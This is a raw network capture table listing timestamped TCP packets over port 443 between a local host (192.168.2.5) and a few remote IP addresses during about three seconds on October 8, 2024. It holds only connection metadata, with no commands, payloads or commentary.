Oct 8, 2024 20:47:43.228182077 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.228261948 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.228286982 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.228374004 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.228465080 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.228487968 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.253845930 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.253985882 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.254123926 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.254281998 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.254281998 CEST	49891	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.254300117 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.254308939 CEST	443	49891	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.256768942 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.256784916 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.257119894 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.257270098 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.257287025 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.525640965 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.525739908 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.527271032 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.527288914 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.527762890 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.529114008 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.529160023 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:43.529211998 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.530145884 CEST	49888	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.530175924 CEST	443	49888	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.583178043 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.583689928 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.583750010 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.584255934 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.584270000 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.685754061 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.685915947 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.686326027 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.687589884 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.687623978 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.687649012 CEST	49893	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.687664032 CEST	443	49893	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.690525055 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.690613031 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.690903902 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.691227913 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.691265106 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.859908104 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.860723019 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.860752106 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.861188889 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.861200094 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.870713949 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.871090889 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.871123075 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.871426105 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.871433020 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.885243893 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.885864973 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.885924101 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.886461973 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.886476994 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.913814068 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.914345980 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.914374113 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.914937973 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.914949894 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.962155104 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.962210894 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:43.963243961 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:43.993844032 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.998225927 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:43.998295069 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:44.009630919 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.009664059 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.009721041 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.009735107 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.009807110 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.011710882 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.011857986 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.012176991 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.024254084 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.024281979 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.024353981 CEST	49895	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.024362087 CEST	443	49895	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.024924040 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:44.024931908 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:44.024947882 CEST	49894	443	192.168.2.5	188.114.96.3
Oct 8, 2024 20:47:44.024951935 CEST	443	49894	188.114.96.3	192.168.2.5
Oct 8, 2024 20:47:44.025860071 CEST	49896	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.025890112 CEST	443	49896	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.028335094 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.028384924 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.028415918 CEST	49897	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.028431892 CEST	443	49897	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.039127111 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.039189100 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.039284945 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.039320946 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.039357901 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.039381981 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.039427996 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.039520025 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.047370911 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.047416925 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.047446966 CEST	49898	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.047458887 CEST	443	49898	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.060509920 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.060540915 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:44.060940027 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.062220097 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.062252045 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:44.066992044 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.067014933 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.069560051 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.069648981 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.069809914 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.070646048 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.070719957 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.070801020 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.070899963 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.070933104 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.071650982 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.071681976 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.071743011 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.071768045 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.071804047 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.071850061 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.071867943 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.342865944 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.389061928 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.561109066 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:44.561212063 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.568196058 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.568259001 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.572218895 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.572242022 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.668767929 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.669399023 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.669471979 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.700695038 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.700723886 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:44.701033115 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:44.703200102 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.703222990 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:44.703272104 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:44.713831902 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.713886976 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.713917971 CEST	49899	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.713936090 CEST	443	49899	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.715754986 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.722567081 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.729255915 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.729279995 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.730257034 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.730263948 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.731441021 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.731491089 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.732139111 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.732152939 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.733479977 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.734678030 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.734698057 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.735156059 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.735163927 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.741269112 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.741782904 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.741806984 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.747354984 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.747361898 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.760997057 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.761034012 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.761091948 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.761377096 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.761393070 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.826131105 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.826252937 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.826297045 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.826323032 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.826412916 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.826482058 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.827719927 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.827747107 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.827764988 CEST	49901	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.827771902 CEST	443	49901	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.828238010 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.828442097 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.828507900 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.829930067 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.829930067 CEST	49905	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.829967022 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.830008984 CEST	443	49905	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.835922956 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.836081028 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.836137056 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.846560955 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.846632957 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.846709013 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.867672920 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.867674112 CEST	49904	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.867700100 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.867722988 CEST	443	49904	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.868849039 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.868891001 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.868946075 CEST	49903	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.868962049 CEST	443	49903	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.883058071 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.883086920 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.883157969 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.902117968 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.902137041 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.904978037 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.905038118 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.905122995 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.905231953 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.905265093 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.913186073 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.913227081 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.913392067 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.913832903 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.913855076 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.913912058 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.914809942 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.914824963 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:44.915213108 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:44.915225983 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.176635027 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:45.176711082 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:45.176835060 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:45.177186966 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:45.177210093 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:45.177222967 CEST	49902	443	192.168.2.5	188.114.97.3
Oct 8, 2024 20:47:45.177228928 CEST	443	49902	188.114.97.3	192.168.2.5
Oct 8, 2024 20:47:45.230734110 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.230788946 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:45.231275082 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.231599092 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.231616974 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:45.395797014 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.396548033 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.396596909 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.397350073 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.397362947 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.574398994 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.574490070 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.574552059 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.575347900 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.575366974 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.575510979 CEST	49906	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.575517893 CEST	443	49906	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.578416109 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.579104900 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.579166889 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.579612017 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.579626083 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.581213951 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.581258059 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.581465006 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.581718922 CEST	49912	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.581733942 CEST	443	49912	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.615163088 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.615909100 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.615922928 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.616473913 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.616492033 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.646945953 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.647490978 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.647521019 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.647923946 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.647929907 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.658834934 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.659316063 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.659334898 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.659759045 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.659765959 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.678957939 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.678991079 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.679040909 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.679080009 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.679136038 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.679352045 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.679408073 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.679444075 CEST	49908	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.679460049 CEST	443	49908	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.682468891 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.682559967 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.682662010 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.682815075 CEST	49913	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.682852983 CEST	443	49913	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.714386940 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.714468956 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.714584112 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.719034910 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.719063044 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.719095945 CEST	49909	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.719104052 CEST	443	49909	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.725301981 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.725356102 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.725594044 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.725794077 CEST	49914	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.725821018 CEST	443	49914	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.737840891 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:45.737951994 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.750008106 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.750230074 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.750380039 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.751436949 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.751455069 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:45.751718998 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:45.751746893 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.751746893 CEST	49907	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.751769066 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.751780987 CEST	443	49907	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.753387928 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.753417015 CEST	49911	443	192.168.2.5	104.21.33.249
Oct 8, 2024 20:47:45.753456116 CEST	443	49911	104.21.33.249	192.168.2.5
Oct 8, 2024 20:47:45.757096052 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.757127047 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.757199049 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.757349014 CEST	49915	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.757360935 CEST	443	49915	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.760849953 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.760921001 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.761023045 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.761188030 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.761359930 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.761359930 CEST	49910	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.761383057 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.761396885 CEST	443	49910	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.763530970 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.763581038 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:45.763665915 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.763808966 CEST	49916	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:45.763827085 CEST	443	49916	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:46.305226088 CEST	443	49911	104.21.33.249	192.168.2.5
